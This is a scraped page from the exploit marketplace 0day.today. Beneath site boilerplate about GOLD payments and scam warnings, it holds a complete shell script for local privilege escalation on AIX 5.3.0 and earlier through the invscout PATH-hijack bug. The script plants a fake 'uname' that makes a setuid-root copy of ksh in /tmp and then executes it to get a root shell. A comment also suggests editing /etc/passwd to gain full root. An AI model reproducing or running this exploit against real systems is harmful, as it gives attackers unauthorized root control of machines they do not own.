0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability
============================================================= AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability ============================================================= #!/usr/bin/sh # r00t exploit written for the invscout bug reported by Idefense labs # http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities # coded by ri0t exploitation is trivial but automated with this script # www.ri0tnet.net # # usage ./getr00t.sh :) # exploitation gives euid(root) from here getting guid (root) is as simple as an # /etc/passwd edit cd /tmp echo '/usr/bin/cp /usr/bin/ksh ./' > uname echo '/usr/bin/chown root:system ./ksh' >> uname echo '/usr/bin/chmod 777 ./ksh' >> uname echo '/usr/bin/chmod +s ./ksh' >> uname /usr/bin/chmod 777 uname PATH=./ export PATH /usr/sbin/invscout PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./" export PATH exec /tmp/ksh # 0day.today [2024-11-15] #